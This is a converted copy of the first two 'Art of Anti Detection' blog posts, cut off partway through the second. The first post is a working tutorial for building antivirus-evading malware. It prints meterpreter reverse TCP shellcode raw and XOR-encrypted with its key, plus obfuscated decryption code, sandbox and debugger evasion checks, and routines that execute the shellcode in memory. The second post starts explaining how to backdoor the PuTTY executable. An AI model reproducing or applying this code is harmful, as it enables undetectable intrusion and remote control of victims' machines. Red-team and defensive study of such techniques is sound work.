Art of Anti Detection

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 34

Art of Anti Detection 1 – Introduction to AV &

Detection Techniques
This blog post will explain effective methods for bypassing the static, dynamic and heuristic
analysis of up to date anti virus products. Some of the methods are already known by
public but there are few methods and implementation tricks that is the key for generating
FUD (Fully Undetectable) malware, also the size of the malware is almost as important as
anti detection, when implementing these methods i will try to keep the size as minimum as
possible. this paper also explains the inner workings of anti viruses and windows operating
system, reader should have at least intermediate C/C++ and assembly knowledge and
decent understanding of PE file structure.

Introduction
Implementing anti detection techniques should be specific for each malware type, all the
methods explained in this paper will also work for all kind of malware but this paper mainly
focuses on stager meterpreter payloads because meterpreter is capable of all the things
that all other malware does, getting a meterpreter session on remote machine allows many
things like privilege escalation, credential stealing, process migration, registry manipulation
and allot more post exploitation, also meterpreter has a very active community and it’s very
popular among security researchers.

Terminology
Signature Based Detection:
Traditional antivirus software relies heavily upon signatures to identify malware.
Substantially, when a malware arrives in the hands of an antivirus firm, it is analysed by
malware researchers or by dynamic analysis systems. Then, once it is determined to be a
malware, a proper signature of the file is extracted and added to the signatures database of
the antivirus software.[1]
Static Program Analyze:
Static program analysis is the analysis of computer software is performed without actually e
xecuting programs.
In most cases the analysis is performed on some version of the source code, and in the oth
er cases, some form of the object code.[2]
Dynamic Program Analyze:
Dynamic program analysis is the analysis of computer software that is performed by
executing programs on a real or virtual processor. For dynamic program analysis to be
effective, the target program must be executed with sufficient test inputs to produce
interesting behavior.[3]
Sandbox:
In computer security, a sandbox is a security mechanism for separating running programs.
It is often used to execute untested or untrusted programs or code, possibly from
unverified or untrusted third parties, suppliers, users or websites, without risking harm to
the host machine or operating system.[4]
Heuristic Analysis:
Heuristic analysis is a method employed by many computer antivirus programs designed to
detect previously unknown computer viruses, as well as new variants of viruses already in
the “wild”.Heuristic analysis is an expert based analysis that determines the susceptibility of
a system towards particular threat/risk using various decision rules or weighing methods.
MultiCriteria analysis (MCA) is one of the means of weighing. This method differs from
statistical analysis, which bases itself on the available data/statistics.[5]
Entropy:
In computing, entropy is the randomness collected by an operating system or application
for use in cryptography or other uses that require random data. This randomness is often
collected from hardware sources, either pre-existing ones such as mouse movements or
specially provided randomness generators. A lack of entropy can have a negative impact on
performance and security.[6]

Common Techniques
When it comes to reducing a malware’s detection score first things that comes in mind are
crypters, packers and code obfuscation. These tools and techniques are still able to bypass
good amount of AV product but because of the advancements in cyber security field most
of the tools and methods in the wild is outdated and can’t produce FUD malware. For
understanding the inner workings of these techniques and tools i will give brief
descriptions;
Obfuscation:
Code obfuscation can be defined as mixing the source code of the binary without disrupting
the real function, it makes static analyzing harder and also changes the hash signatures of
the binary. Obfuscation can simply be implemented with adding few lines of garbage code
or programmatically changing the execution order of the instructions. This method can
bypass good amount of AV product but it depends on how much you obfuscate.
Packers:
Executable packer is any means of compressing an executable file and combining the
compressed data with decompression code into a single executable. When this compressed
executable is executed, the decompression code recreates the original code from the
compressed code before executing it. In most cases this happens transparently so the
compressed executable can be used in exactly the same way as the original. When a AV
scanner scans a packed malware it needs to determine the compression algorithm and
decompress it. Because of files that packed with packers are harder to analyze malware
authors have a keen interest on packers.
Crypters:
Crypters are programs that encrypts the given binary for making it hard to analyze or
reverse engineer. A crypter exists of two parts, a builder and a stub, builder simply just
encrypts the given binary and places inside the stub, stub is the most important piece of
the crypter, when we execute the generated binary first stub runs and decrypts the original
binary to memory and then executes the binary on memory via “RunPE” method(in most
cases).

The Problem About Crypters & Packers


Before moving on to the effective methods, there are few things that needs to be
acknowledged about what is wrong in well known techniques and tools. Today’s AV
companies has already realized the danger, now instead of just searching for malware
signatures and harmful behavior they also search for signs of crypters and packers.
Compared to detecting malware, detecting crypters and packers is relatively easy because
of they all have to do certain suspicious things like decrypting the encrypted PE file and
executing it on the memory.
PE Injection:
In order to fully explain the in memory execution of a PE image i have to talk about how
windows loads the PE files. Generally when compiling a PE file the compiler sets the main
module address at 0x00400000, while compile process all the full address pointers and
addresses at long jump instructions are calculated according to main module address, at
the end of compiling process compiler creates a relocation table section in PE file, relocation
section contains the addresses of instructions that depends on the base address of the
image, such as full address pointers and long jump instruction.
While in execution of the PE image, operating system checks the availability of the PE
image’s preferred address space, if the preferred space is not available, operating system
loads the PE image to a random available address on memory, before starting the process
system loader needs to adjust the absolute addresses on memory, with the help of
relocation section system loader fixes the all address dependent instructions and starts the
suspended process. All this mechanism is called “Address Layout Randomization”.[7]
In order to execute a PE image on memory crypters needs to parse the PE headers and
relocate the absolute addresses, simply they have to mimic system loader witch is very
unusual and suspicious. When we analyze crypters written in c or higher level languages in
almost every cases we could see these windows API functions called
“NtUnmapViewOfSection” and “ZwUnmapViewOfSection” these functions simply unmaps a
view of a section from the virtual address space of a subject process, they play a very
important role at in memory execution method called RunPE which almost %90 of crypters
uses.

1. xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"),
"NtUnmapViewOfSection"));
2. xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));

Of course AV products can’t just declare malicious for every program that uses these
windows API functions, but the order of using this functions matter a lot. There are small
percentage of crypters(mostly written in assembly) witch does not uses these functions and
performs the relocation manually, they are very effective at the time but sooner or later
usage of crypters will not be profitable because of logically no non harmful program tries to
mimic the system loader. Another downside is huge entropy increase on input files, because
of encrypting the entire PE file, entropy will rise inevitably, when AV scanners detects
unusual entropy on a PE file they will probably mark the file as suspicious.

Perfect Approach
The concept of encrypting the malicious code is clever but the decryption function should
be obfuscated properly and when it comes to executing the decrypted code in memory we
have to do it without relocating the absolute addresses, also there has to be a detection
mechanism checking for weather the malware is analyzing dynamically in a sand box or
not, if detection mechanism detects that malware is being analyzed by the AV then the
decryption function shouldn’t be executed. Instead of encrypting the entire PE file
encrypting shellcodes or only the .text section of the binary is much more suitable, it keeps
the entropy and size low and makes no changes to image headers and sections.
This will be the malware flow chart.

Our “AV Detect.” function will detect if the malware is being analyze dynamically in a
sandbox or not, if the function detects any sign of AV scanner then it will call the main
function again or just crash, if “AV Detect” function don’t finds any sign of AV scanner it will
call the “Decrypt Shellcode” function
This is meterpreter reverse tcp shellcode in raw format.

1. unsigned char Shellcode[] = {


2. 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64,
3. 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28,
4. 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
5. 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, 0x8b, 0x52,
6. 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, 0x01, 0xd1,
7. 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, 0x3a, 0x49,
8. 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, 0x0d, 0x01,
9. 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75,
10. 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b,
11. 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24,
12. 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, 0x5f, 0x5a,
13. 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x68, 0x33, 0x32, 0x00, 0x00, 0x68, 0x77,
14. 0x73, 0x32, 0x5f, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0xb8,
15. 0x90, 0x01, 0x00, 0x00, 0x29, 0xc4, 0x54, 0x50, 0x68, 0x29, 0x80, 0x6b,
16. 0x00, 0xff, 0xd5, 0x6a, 0x05, 0x68, 0x7f, 0x00, 0x00, 0x01, 0x68, 0x02,
17. 0x00, 0x11, 0x5c, 0x89, 0xe6, 0x50, 0x50, 0x50, 0x50, 0x40, 0x50, 0x40,
18. 0x50, 0x68, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x97, 0x6a, 0x10, 0x56,
19. 0x57, 0x68, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0c,
20. 0xff, 0x4e, 0x08, 0x75, 0xec, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
21. 0x6a, 0x00, 0x6a, 0x04, 0x56, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff,
22. 0xd5, 0x8b, 0x36, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x56, 0x6a,
23. 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0x53, 0x6a, 0x00,
24. 0x56, 0x53, 0x57, 0x68, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x01, 0xc3,
25. 0x29, 0xc6, 0x75, 0xee, 0xc3
26. };

For keeping the entropy and size in appropriate value i will pass this shellcode to simple xor
cipher with a multi byte key, xor is not an encryption standard like RC4 or blowfish but we
don’t need a strong encryption anyway, AV products is not going to try to decrypt the
shellcode, making it unreadable and undetectable for static string analysis is enough, also
using xor makes decryption process much more faster and avoiding the encryption libraries
in code will reduce the size a lot.
This is the same meterpreter code xor ciphered with key.

1. unsigned char Shellcode[] = {


2. 0xfb, 0xcd, 0x8d, 0x9e, 0xba, 0x42, 0xe1, 0x93, 0xe2, 0x14, 0xcf, 0xfa,
3. 0x31, 0x12, 0xb1, 0x91, 0x55, 0x29, 0x84, 0xcc, 0xae, 0xc9, 0xf3, 0x32,
4. 0x08, 0x92, 0x45, 0xb8, 0x8b, 0xbd, 0x2d, 0x26, 0x66, 0x59, 0x0d, 0xb2,
5. 0x9a, 0x83, 0x4e, 0x17, 0x06, 0xe2, 0xed, 0x6c, 0xe8, 0x15, 0x0a, 0x48,
6. 0x17, 0xae, 0x45, 0xa2, 0x31, 0x0e, 0x90, 0x62, 0xe4, 0x6d, 0x0e, 0x4f,
7. 0xeb, 0xc9, 0xd8, 0x3a, 0x06, 0xf6, 0x84, 0xd7, 0xa2, 0xa1, 0xbb, 0x53,
8. 0x8c, 0x11, 0x84, 0x9f, 0x6c, 0x73, 0x7e, 0xb6, 0xc6, 0xea, 0x02, 0x9f,
9. 0x7d, 0x7a, 0x61, 0x6f, 0xf1, 0x26, 0x72, 0x66, 0x81, 0x3f, 0xa5, 0x6f,
10. 0xe3, 0x7d, 0x84, 0xc6, 0x9e, 0x43, 0x52, 0x7c, 0x8c, 0x29, 0x44, 0x15,
11. 0xe2, 0x5e, 0x80, 0xc9, 0x8c, 0x21, 0x84, 0x9f, 0x6a, 0xcb, 0xc5, 0x3e,
12. 0x23, 0x7e, 0x54, 0xff, 0xe3, 0x18, 0xd0, 0xe5, 0xe7, 0x7a, 0x50, 0xc4,
13. 0x31, 0x50, 0x6a, 0x97, 0x5a, 0x4d, 0x3c, 0xac, 0xba, 0x42, 0xe9, 0x6d,
14. 0x74, 0x17, 0x50, 0xca, 0xd2, 0x0e, 0xf6, 0x3c, 0x00, 0xda, 0xda, 0x26,
15. 0x2a, 0x43, 0x81, 0x1a, 0x2e, 0xe1, 0x5b, 0xce, 0xd2, 0x6b, 0x01, 0x71,
16. 0x07, 0xda, 0xda, 0xf4, 0xbf, 0x2a, 0xfe, 0x1a, 0x07, 0x24, 0x67, 0x9c,
17. 0xba, 0x53, 0xdd, 0x93, 0xe1, 0x75, 0x5f, 0xce, 0xea, 0x02, 0xd1, 0x5a,
18. 0x57, 0x4d, 0xe5, 0x91, 0x65, 0xa2, 0x7e, 0xcf, 0x90, 0x4f, 0x1f, 0xc8,
19. 0xed, 0x2a, 0x18, 0xbf, 0x73, 0x44, 0xf0, 0x4b, 0x3f, 0x82, 0xf5, 0x16,
20. 0xf8, 0x6b, 0x07, 0xeb, 0x56, 0x2a, 0x71, 0xaf, 0xa5, 0x73, 0xf0, 0x4b,
21. 0xd0, 0x42, 0xeb, 0x1e, 0x51, 0x72, 0x67, 0x9c, 0x63, 0x8a, 0xde, 0xe5,
22. 0xd2, 0xae, 0x39, 0xf4, 0xfa, 0x2a, 0x81, 0x0a, 0x07, 0x25, 0x59, 0xf4,
23. 0xba, 0x2a, 0xd9, 0xbe, 0x54, 0xc0, 0xf0, 0x4b, 0x29, 0x11, 0xeb, 0x1a,
24. 0x51, 0x76, 0x58, 0xf6, 0xb8, 0x9b, 0x49, 0x45, 0xf8, 0xf0, 0x0e, 0x5d,
25. 0x93, 0x84, 0xf4, 0xf4, 0xc4
26. };
27.
28. unsigned char Key[] = {
29. 0x07, 0x25, 0x0f, 0x9e, 0xba, 0x42, 0x81, 0x1a
30. };

Because of we are writing a new piece of malware, our malware’s hash signature will not
be known by the anti virus products, so we don’t need to worry about signature based
detection, we will encrypt our shellcode and obfuscate our anti detection/reverse
engineering and decryption functions also these will be enough for bypassing
static/heuristic analysis phase, there is only one more phase we need to bypass and it is
the dynamic analysis phase,most important part is the success of the “AV detect” function,
before starting to write the function we need to understand how heuristic engines of AV
products works.

Heuristic Engines
Heuristic engines are basically statistical and rule based analyze mechanisms. Their main
purpose is detecting new generation(previously unknown) viruses by categorizing and
giving threat/risk grades to code fragments according to predefined criterias, even when a
simple hello world program scanned by AV products, heuristic engine decides on a
threat/risk score if the score is higher then thresholds then the file gets marked as
malicious. Heuristic engines are the most advanced part of AV products they use significant
amount of rules and criterias, since no anti virus company releases blueprints or
documentation about their heuristic engines all known selective criterias about their
threat/risk grading policy are found with trial and error.
Some of the known rules about threat grading;
– Decryption loop detected
– Reads active computer name
– Reads the cryptographic machine GUID
– Contacts random domain names
– Reads the windows installation date
– Drops executable files
– Found potential IP address in binary memory
– Modifies proxy settings
– Installs hooks/patches the running process
– Injects into explorer
– Injects into remote process
– Queries process information
– Sets the process error mode to suppress error box
– Unusual entrophy
– Possibly checks for the presence of antivirus engine
– Monitors specific registry key for changes
– Contains ability to elevate privileges
– Modifies software policy settings
– Reads the system/video BIOS version
– Endpoint in PE header is within an uncommon section
– Creates guarded memory regions
– Spawns a lot of processes
– Tries to sleep for a long time
– Unusual sections
– Reads windows product id
– Contains decryption loop
– Contains ability to start/interact device drivers
– Contains ability to block user input

When writing our AV detect and Decrypt Shellcode functions we have to be careful about all
this rules.
Decrypt Shellcode:
Obfuscating the decryption mechanism is vital, most of AV heuristic engines are able to
detect decryption loops inside PE files, after the huge increase on ransomware cases even
some heuristic engines are build mainly just for finding encryption/decryption routines, after
they detect a decryption routine, some scanners waits until ECX register to be “0” most of
the time that indicates the end of loop, after they reach the end of the decryption loop they
will re analyze the decrypted content of the file.
This will be the “Decrypt Shellcode” function,

1. void DecryptShellcode() {
2. for (int i = 0; i < sizeof(Shellcode); i++) {
3.
4. __asm
5. {
6. PUSH EAX
7. XOR EAX, EAX
8. JZ True1
9. __asm __emit(0xca)
10. __asm __emit(0x55)
11. __asm __emit(0x78)
12. __asm __emit(0x2c)
13. __asm __emit(0x02)
14. __asm __emit(0x9b)
15. __asm __emit(0x6e)
16. __asm __emit(0xe9)
17. __asm __emit(0x3d)
18. __asm __emit(0x6f)
19.
20. True1:
21. POP EAX
22. }
23.
24.
25. Shellcode[i] = (Shellcode[i] ^ Key[(i % sizeof(Key))]);
26.
27.
28.
29. __asm
30. {
31. PUSH EAX
32. XOR EAX, EAX
33. JZ True2
34. __asm __emit(0xd5)
35. __asm __emit(0xb6)
36. __asm __emit(0x43)
37. __asm __emit(0x87)
38. __asm __emit(0xde)
39. __asm __emit(0x37)
40. __asm __emit(0x24)
41. __asm __emit(0xb0)
42. __asm __emit(0x3d)
43. __asm __emit(0xee)
44. True2:
45. POP EAX
46. }
47. }
48. }

It is a for loop that makes logical xor operation between a shellcode byte and a key byte,
below and above assembly blocks literally does noting, they cover the logical xor operation
with random bytes and jumps over them. Because of we are not using any advanced
decryption mechanism this will be enough for obfuscating “Decrypt Shellcode” function.
Dynamic Analysis Detection:
Also while writing the sandbox detection mechanism we need to obfuscate our methods, if
the heuristic engine detects any sign of anti reverse engineering methods it would be very
bad for malware’s threat score.
Is Debugger Present:
Our first AV detection mechanism will be checking for debugger in our process
There is a windows API function for this operation it ”Determines whether the calling
process is being debugged by a user-mode debugger.” but we will not use it because of
most AV products are monitoring the win API calling statements, they probably detect and
treat this function as a anti reverse engineering method. Instead of using the win API
function we will go and look at the “BeingDebuged” byte at PEB block.

1. // bool WINAPI IsDebuggerPresent(void);


2. __asm
3. {
4. CheckDebugger:
5. PUSH EAX // Save the EAX value to stack
6. MOV EAX, DWORD PTR FS : [0x18] // Get PEB structure address
7. MOV EAX, DWORD PTR[EAX + 0x30] // Get being debugged byte
8. CMP BYTE PTR[EAX + 2], 0 // Check if being debuged byte is set
9. JNE CheckDebugger // If debugger present check again
10. POP EAX // Put back the EAX value
11. }

With some inline assembly this piece of code points a pointer to the BeingDebuged byte in
PEB block, if debugger present it will check again until a overflow occurs in stack, when an
overflow occurs the stack canaries will trigger an exception and process will be closed, this
is the shortest way to exit the program. Manually checking the BeingDebuged byte will
bypass good amount of AV product but still some AV products have taken measures about
this issue so we need to obfuscate the code for avoiding the static string analysis.

1. __asm
2. {
3. CheckDebugger:
4. PUSH EAX
5. MOV EAX, DWORD PTR FS : [0x18]
6. __asm
7. {
8. PUSH EAX
9. XOR EAX, EAX
10. JZ J
11. __asm __emit(0xea)
12. J:
13. POP EAX
14. }
15. MOV EAX, DWORD PTR[EAX + 0x30]
16. __asm
17. {
18. PUSH EAX
19. XOR EAX, EAX
20. JZ J2
21. __asm __emit(0xea)
22. J2:
23. POP EAX
24. }
25. CMP BYTE PTR[EAX + 2], 0
26. __asm
27. {
28. PUSH EAX
29. XOR EAX, EAX
30. JZ J3
31. __asm __emit(0xea)
32. J3:
33. POP EAX
34. }
35. JNE CheckDebugger
36. POP EAX
37. }

I have added jump instruction after all operation, this will not effect out purpose but adding
garbage bytes between jumps will obfuscate the code and avoid static string filters.
Load Fake Library:
This method we will try to load a non existing dll on runtime. Normally when we try to load
a non existing dll HISTENCE returns NULL, but some dynamic analysis mechanisms in AV
products allows such cases in order to further investigate the execution flow of the
program.

1. bool BypassAV(char const * argv[]) {


2. HINSTANCE DLL = LoadLibrary(TEXT("fake.dll"));
3. if (DLL != NULL) {
4. BypassAV(argv);
5. }

Get Tick Count:


In this method we will be exploiting the time deadline of AV products. In most cases AV
scanners are being designed for end user, they need to be user friendly and suitable for
daily usage this means they can’t spend too much time for scanning files they need to scan
files as quickly as possible. At first malware developers used “sleep()” function for waiting
until the scan complete, but nowadays this trick almost never works, every AV product
skips the sleep function when they encountered one. We will use this against them , below
code uses a win API function called “GetThickCount()” this function “Retrieves the number
of milliseconds that have elapsed since the system was started, up to 49.7 days.” we will
use it to get the time passed since OS booted, then try to sleep 1 second, after sleep
function we will check weather sleep function is skipped or not by comparing the two
GetTickCout() value.

1. int Tick = GetTickCount();


2. Sleep(1000);
3. int Tac = GetTickCount();
4. if ((Tac - Tick) < 1000) {
5. return false;
6. }

Number Of Cores:
This method will simply check the number of processor cores on the system. Since AV
products can’t afford allocating too much resource from host computer we can check the
core number in order to determine are we in a sandbox or not. Even some AV products
does not support multi core processing so they shouldn’t be able to reserve more than 1
processor core to their sandbox environment.

1. SYSTEM_INFO SysGuide;
2. GetSystemInfo(&SysGuide);
3. int CoreNum = SysGuide.dwNumberOfProcessors;
4. if (CoreNum < 2) {
5. return false;
6. }

Huge Memory Allocations:


This method also exploits the time deadline on each AV scan, we simply allocate nearly 100
Mb of memory then we will fill it with NULL bytes, at the end we will free it.

1. char * Memdmp = NULL;


2. Memdmp = (char *)malloc(100000000);
3. if (Memdmp != NULL) {
4. memset(Memdmp, 00, 100000000);
5. free(Memdmp);
6. }

When the programs memory starts to grow on runtime eventually AV scanners will end the
scan for the sake of not to spend too much time on a file, this method can be used multiple
times. This is a very primitive and old technique but it still bypasses good amount of
scanners.
Trap Flag Manipulation:
The trap flag is used for tracing the program. If this flag is set every instruction will raise
“SINGLE_STEP” exception.Trap flag can be manipulated in order thwart tracers. We can
manipulate the trap flag with below code

1. __asm
2. {
3. PUSHF // Push all flags to stack
4. MOV DWORD [ESP], 0x100 // Set 0x100 to the last flag on the stack
5. POPF // Put back all flags register values
6. }

Mutex Triggered WinExec:


This method is very promising because of its simplicity, we create a condition for checking
whether a certain mutex object already exists on the system or not.

1. HANDLE AmberMutex = CreateMutex(NULL, TRUE, "FakeMutex");


2. if(GetLastError() != ERROR_ALREADY_EXISTS){
3. WinExec(argv[0],0);
4. }

If “CreateMutex” function does not return already exists error we execute the malware
binary again, since most of the AV products don’t let programs witch are dynamically
analyzing to start new processes or access the files outside the AV sandbox, when the
already exist error occurs execution of the decrypt function may start. There are much
more creative ways of mutex usage in anti detection.
Proper Ways To Execute Shellcodes
Starting with Windows Vista, Microsoft introduced Data Execution Prevention or DEP[8], a
security feature that can help prevent damage to your computer by monitoring programs
from time to time. Monitoring ensures that running program uses system memory
efficiently. If there is any instance of a program on your computer using memory
incorrectly, DEP notices it, closes the program and notifies you. That means you can’t just
put some bytes to an char array and execute it, you need to allocate a memory region with
read,write and execute flags using windows API functions.
Microsoft has several memory manipulation API functions for reserving memory pages,
most of the common malware in the field uses the “VirtualAlloc” function for reserving
memory pages, as you can guess common usage of functions helps AV products with
defining detection rules, using other memory manipulation functions will also do the trick
and they may attract less attention.
I will list several shellcode execution method with different memory manipulation API
function,
HeapCreate/HeapAlloc:
Windows also allows creating RWE heap regions.

1. void ExecuteShellcode(){
2. HANDLE HeapHandle = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof(Shellcode), sizeof(Shellcode));
3. char * BUFFER = (char*)HeapAlloc(HeapHandle, HEAP_ZERO_MEMORY, sizeof(Shellcode));
4. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
5. (*(void(*)())BUFFER)();
6. }

LoadLibrary/GetProcAddress:
LoadLibrary and GetProcAddress win api function combination allows us to use all other win
api functions, with this usage there will be no direct call to the memory manipulation functi
on and malware will probably be less attractive.

1. void ExecuteShellcode(){
2. HINSTANCE K32 = LoadLibrary(TEXT("kernel32.dll"));
3. if(K32 != NULL){
4. MYPROC Allocate = (MYPROC)GetProcAddress(K32, "VirtualAlloc");
5. char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
6. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
7. (*(void(*)())BUFFER)();
8. }
9. }

GetModuleHandle/GetProcAddress:
This method does not even uses the LoadLibrary function it takes advantage of already load
ed kernel32.dll, GetModuleHandle function retrieves the module handle from an already loa
ded dll, this method is possibly one of the most silent way to execute shellcode.

1. void ExecuteShellcode(){
2. MYPROC Allocate = (MYPROC)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAlloc");
3. char* BUFFER = (char*)Allocate(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
4. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
5. (*(void(*)())BUFFER)();
6. }

Multi Threading
It is always harder to reverse engineer multi threaded PE files, it is also challenging for AV
products, multi threading approach can be used with all execution methods above so
instead of just pointing a function pointer to shellcode and executing it creating a new
thread will complicate things for AV scanners plus it allow us to keep executing the “AV
Detect” function while executing the shellcode at same time.

1. void ExecuteShellcode(){
2. char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
3. memcpy(BUFFER, Shellcode, sizeof(Shellcode));
4. CreateThread(NULL,0,LPTHREAD_START_ROUTINE(BUFFER),NULL,0,NULL);
5. while(TRUE){
6. BypassAV(argv);
7. }
8. }

Above code executes the shellcode with creating a new thread, just after creating the
thread there is a infinite whlie loop that is executing bypass av function, this approach will
almost double the effect of our bypass av function, bypass AV function will be keep
checking for sandbox and dynamic analysis signs while shellcode runs, this is also vital for
bypassing some advanced heuristic engines that waits until the execution of the shellcode.
Conclusion
Towards the end there are few more thinks that needs to be covered about compiling the
malware, when compiling the source, safeguards like stack savers need to be on and
striping the symbols is vital for hardening the reverse engineering process of our malware
and reducing the size, compiling on visual studio is recommended because of the inline
assembly syntax that used in this paper.
When all of this methods combined, generated malware is able to bypass 35 most
advanced AV product.
PoC
The Meterpreter created by using the techniques we have described in this article shows
how our malware produces results in real systems.

Sooner or later this method also going to expire, but there will always be more ways to
bypass AV products.
References:
[1] – https://en.wikipedia.org/wiki/Antivirus_software
[2] – https://en.wikipedia.org/wiki/Static_program_analysis
[3] – https://en.wikipedia.org/wiki/Dynamic_program_analysis
[4] – https://en.wikipedia.org/wiki/Sandbox_(computer_security)
[5] – https://en.wikipedia.org/wiki/Heuristic_analysis
[6] – https://en.wikipedia.org/wiki/Entropy
[7] – https://en.wikipedia.org/wiki/Address_space_layout_randomization
[8] – https://msdn.microsoft.com/en-us/library/windows/desktop/aa366553(v=vs.85).aspx
The Antivirus Hacker’s Handbook
The Rootkit Arsenal: Escape and Evasion: Escape and Evasion in the Dark Corners of the
System
http://venom630.free.fr/pdf/Practical_Malware_Analysis.pdf
http://pferrie.host22.com/papers/antidebug.pdf
https://www.symantec.com/connect/articles/windows-anti-debug-reference
https://www.exploit-db.com/docs/18849.pdf
http://blog.sevagas.com/?Fun-combining-anti-debugging-and
Art of Anti Detection 2 – PE Backdoor
Manufacturing
This paper will explain several methods used for placing backdoors in PE(Portable
Executable) files for red team purposes, in order to fully grasp the content of this paper,
readers needs to have at least intermediate x86 assembly knowledge, familiarity with
debuggers and decent understanding of PE file format.

Introduction
Nowadays almost all security researchers, pentesters and malware analysts deals with
backdoors in a daily basis, placing a backdoor to a system or specifically to a program is the
most popular way for maintaining the access. Majority of this paper’s content will be about
methods for implanting backdoors to 32 bit PE files, but since the PE file format is a
modified version of Unix COFF(Common Object File Format) the logic behind the methods
can be implemented for all other executable binary file types. Also the stealthiness of the
implanted backdoor is very important for staying longer in the systems, the methods that
will be explained in this paper are prepared according to get the lowest detection rate as
possible. Before moving further in this paper reading the first article Introduction To AV &
Detection Techniques of Art Of Anti Detection article series would be very helpful for
understanding the inner workings of AV products and fundamental thinks about anti
detection.

Terminology
Red Team Pentesting: When used in a hacking context, a red team is a group of white-
hat hackers that attack an organization’s digital infrastructure as an attacker would in order
to test the organization’s defenses (often known as “penetration testing”).Companies
including Microsoft perform regular exercises under which both red and blue teams are
utilized. Benefits include challenges to preconceived notions and clarifying the problem
state that planners are attempting to mitigate. More accurate understanding can be
developed of how sensitive information is externalized and of exploitable patterns and
instances of bias.
Address space layout randomization: (ASLR) is a computer security technique involved
in protection from buffer overflow attacks. In order to prevent an attacker from reliably
jumping to, for example, a particular exploited function in memory, ASLR randomly
arranges the address space positions of key data areas of a process, including the base of
the executable and the positions of the stack, heap and libraries.
Code Caves: A code cave is a piece of code that is written to another process’s memory by
another program. The code can be executed by creating a remote thread within the target
process. The Code cave of a code is often a reference to a section of the code’s script
functions that have capacity for the injection of custom instructions. For example, if a
script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes
can be used to add external code to the script. This is what is referred to as a Code cave.
Checksum: A checksum is a small-sized datum from a block of digital data for the purpose
of detecting errors which may have been introduced during its transmission or storage. It is
usually applied to an installation file after it is received from the download server. By
themselves, checksums are often used to verify data integrity but are not relied upon to
verify data authenticity.

Main Methods
All the implementations and examples in this paper will be over putty SSH client executable.
There are several reason for selecting putty for backdooring practice, one of them is putty
client is a native C++ project that uses multiple libraries and windows APIs, another reason
is backdooring a ssh client attracts less attention, because of program is already performing
tcp connection it will be easier to avoid blue team network monitoring,
The backdoor code that will be used is Stephen Fever’s reverse tcp
meterpreter shellcode from metasploit project. The main goal is injecting the meterpreter
shellcode to target PE file without disrupting the actual functionality of the program.
Injected shellcode will execute on a new thread and will try to connect to the handler
continuously. While doing all these, another goal is keeping the detection score as low as
possible.
The common approach for implanting backdoors in PE files consists of 4 main steps,
1) Finding available space for backdoor code
2) Highjacking execution flow
3) Injecting backdoor code
4) Restoring execution flow
In each step there are small details which is the key for implanting consistent, durable and
undetectable backdoors.

Available Space Problem


Finding available space is the first step that needs to be done, how you select the right
space inside PE file to insert backdoor code is very important, the detection score of
backdoored file highly depends on how you decide on solving the space problem.There is
two main approach for solving the space problem,
1) Adding A New Section
This one has more drawbacks with detection score compared to the other approach but
with appending a whole new section there is no space limit for the backdoor code that will
be implanted.
With using a dis assembler or PE editor like LordPE, all PE files can be enlarged with adding
a new section header, here is the section table of putty executable, with the help of PE
editor, new section “NewSec” added with the size of 1000 bytes,
While creating a new section, setting the section flags as “Read/Write/Execute” is vital for
running the backdoor shellcode when PE image mapped on the memory.

after adding the section header the file size needs to be adjusted, this can be easily
achieved with adding null bytes with the size of the section at the end of the file on a hex
editor.
After these operations new empty section is successfully added to the file, running the file
after adding a new section is suggested in case of any errors, if the executable is running
smoothly the new section is ready to be modified on a debugger.

Solving the space problem with adding a new section has few drawbacks on anti detection
score, almost all AV products recognizes uncommon sections and giving all
(Read/Write/Execute) permission to an uncommon section is surely very suspicious.
Even when adding a empty full permission section to putty executable, it gets flagged as
malicious by some AV products.
2) Code Caves
Second approach for solving the space problem is using the code caves of the target
executable. Almost all compiled binary files have code caves that can be used when
backdooring operations. Using code caves instead of new added sections attracts far less
